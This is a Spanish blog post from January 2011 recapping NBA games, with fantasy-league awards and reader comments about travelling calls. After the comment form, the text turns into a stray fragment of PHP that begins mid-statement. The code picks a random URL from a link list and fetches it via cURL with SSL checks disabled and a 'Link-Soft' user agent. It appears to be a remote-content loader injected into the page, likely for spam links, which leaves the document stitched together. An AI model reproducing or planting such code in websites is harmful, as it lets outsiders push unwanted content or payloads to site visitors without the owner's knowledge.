La Crónica (25/01/2011)

26 de January de 2011 por TheDeerHunter

Jornada descafeinada. Nadie padeció del corazón anoche en un partido de baloncesto.

Les vino bien a los Celtics recibir a los Cavaliers mientras van recuperando sus pívots (95-112). Además de la buenísima noticia de la vuelta de Kedrick Perkins, no hubo demasiada historia, si acaso ver como Pierce y Allen siguen acumulando méritos para el all-star y poder contemplar algunos jóvenes que en condiciones normales no se acercarían a la cancha ni en el descanso. Samardo, Manny Harris, Eyenga, Erden o Harangody disfrutaron de buenos minutos.

A los Lakers también les vino bien el rival de ayer. No es que los Jazz sean comparables a Cleveland, pero contra los amarillos y en el Staples últimamente es como si lo fueran (91-120). Terrible partido de los de Sloan, que casi no se acercaron a menos de 30 puntos. Da la sensación que los campeones se han puesto las pilas, pero conociéndolos tampoco dejemos que nos engañen.

Partido muy completo de los Nuggets en Washington (120-109). Los Wizards jugaron francamente bien, pero si logra centrarse el equipo de Karl es temible. Anoche lo hizo y, a pesarde algunas bajas importantes como la de JR, dio una exhibición colectiva con 6 tíos por encima de los 15 puntos y cada cual haciendo su trabajo. Por los Wizards destacó especialmente Blatche, capaz de lo mejor cuando le pega el aire.

Particularmente no me gustó la victoria de Dallas (105-112). El partido estaba reñido a pesar de la baja de Eric Gordon por los Clippers (nada menos que un mes… gafadísimos) pero entonces encontraron la mejor manera de parar a Griffin. Sacar a Haywood exclusivamente para cargárselo. Falta criminal que lo dejó magullado el resto del choque y a los Clippers entregados, cuando Terry y Barea tiraron de calidad para amasar la diferencia.

Por último otro gran partido de los Bobcats, metiéndose en plaza de postemporada (94-89). Jackson y Wallace por sus fueros y Kwane Brown no había cogido tantos rebotes desde juveniles. Los Kings estuvieron demasiado desacertados en ambos lados de la cancha.

PREMIOS

MVP: No ha sido esta una jornada con actuación increíbles. Por eso los 20 puntos (9 de 13), 7 rebotes y 5 asistencias de Pau Gasol son más que suficientes para llevarse el premio del día.

Rookie: 22 puntos y 11 rebotes para Blake Griffin. Pero veremos como se las apaña ahora que Eric Gordon estará fuera de las canchas durante 3 semanas. Los Clippers necesitarán un poco más de él. John Wall se fue a los 10 puntos, 13 asistencias y 5 rebotes que tampoco está nada mal.

Sorpresa: Por suerte para los Mavs anoche emergió la figura de José Juan Barea. Sus 25 puntos (9 de 12) compensaron el desastre de Jason Kidd y permitieron imponerse a los Clippers. Atentos también a los 18 rebotes y 13 puntos de Kwame Brown. Parece ser que muerto del todo no estaba.

Decepción: Muy malas impresiones están dejando los Jazz en estos últimos partidos. ¿Dónde ha quedado, por ejemplo, el Paul Millsap de las primeras jornadas?

Esfuerzo en vano: Tener a Andray Blatche en una liga fantástica es algo que puede atacar tus nervios muy seriamente. El irregular ala-pívot de los Wizards fue anoche el mejor de su equipo en la derrota frente Denver con 25 puntos, 9 rebotes, 4 asistencias y 3 rebotes. Si lo dejaste en el banquillo, muy mal hiciste.

Imágenes | Getty Images

Comenta

10 comentarios a esta entrada

  1. AndiD dice:
    #1

    Para todos los que odiamos (me incluyo) que a Lebron no le piten los pasos que hace casi cada vez que entra a canasta, ahí os dejo el resumen del UTA-LAL de ayer:
    http://www.nba.com/video/games/lakers/2011/01/25/0021000667_uta_lal_recap.nba/
    Ojo a la primer jugada del resumen (00:12), donde Kobe hace 2 VECES!! pasos en una sola jugada 😀

      Citar

  2. Jose Luis dice:
    #2

    ¿Alguien podría ponerme un enlace para la liga fantasía? Es que leo muchas veces sobre ella pero no sé donde puedo registrarme ni nada

    Gracias 😉

      Citar

  3. Txusma dice:
    #3

    Descarados los pasos además. Hacer pasos en un entrada a canasta totalmente solo es cierto q no es importante a nivel del resultado o de polémica arbitral pero te deja una sensación de “todo vale” muy molesta.

      Citar

  4. Denise dice:
    #4

    El otro día ante Nuggets, en un contraataque similar a este, se cruzó un poco más de media cancha con 3 botes de balón. Imaginad la de pasos que haría.
    Eso sí, me encantaría que en Europa pusiesen la regla NBA de prohibido palmear o sacar el balón por encima del cilindro imaginario del aro. Detesto ver a los Morris, D’or Fischer, Vazquez y compañía sacando aprovechandose de su fisico y sacando balones que acabarían dentro del aro con esta regla.

      Citar

  5. Busky23 dice:
    #5

    Es muy triste la situación en la que se encuentran los Cavs,se han convertido en un equipo esparrin,sus rivales se entrenan con ellos y dan minutos a su fondo de banquillo,lo dicho,muy triste.
    Que le pasa a Utah ???,no me esperaba una bajada de rendimiento tan brutal.
    Muy bien Lakers,con todos participativos y sin dejarse ir(cosa rara) a pesar de los 30 puntos de diferencia. Prefiero al Kobe que estamos viendo últimamente,asistiendo y seleccionando mucho mejor sus tiros.
    Odom y Pau siguen en buena línea y Bynum cada vez se le ve mejor,creo que el domingo darán el primer gran golpe encima de la mesa.

      Citar

  6. Rodri dice:
    #6

    ¿En qué liga fantástica jugáis?

      Citar

  7. HisRoyalAirness dice:
    #7

    Bueno, ahora que se comenta lo de los pasos, la jugada (ya mîtica) de Griffin contra los Knicks en la que machaca en un contraataque tras un reverso hace como 700 pasos. Que conste que la jugada es brutal pero al final ya no se sabe cuales son las normas.

    Y esto sin hablar de los dobles que hacen TODOS en dribles y cambios de dirección

      Citar

  8. Denise dice:
    #8

    ¿A lo que aquí se pita como acompañamiento te refieres? En eso Paul y Wade son los maestros.
    Yo creo que en todo este asunto se debería aclarar cuales son las normas, y cuantos pasos de salida puedes dar y si puedes hacer el acompañamiento o no, y mantener el mismo criterio para todos. Lo frustrante es que los cracks tienen libertad, y cuando lo hace un rookie o un jugador normalito hay muchas veces que se lo pitan.

      Citar

  9. HisRoyalAirness dice:
    #9

    Sí, a eso me refiero. En la NBA no se pita? Porque lo de Wade, como tú dices, Kobe y alguno más es de locos.
    En cuanto a los pasos, a mí cuando el jugador se va solo y se quiere tirar el rollo pues vale pero a Lebron, por ejemplo, en finales apretados le he visto dar 3 pasos para entrar a canasta, meterla y que aún encima le piten falta.

      Citar

  10. Sancho88 dice:
    #10

    A Cousins siemper le pitan pasos. Estoy de acuerdo con vosotros. Siempre depende de quién los de

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>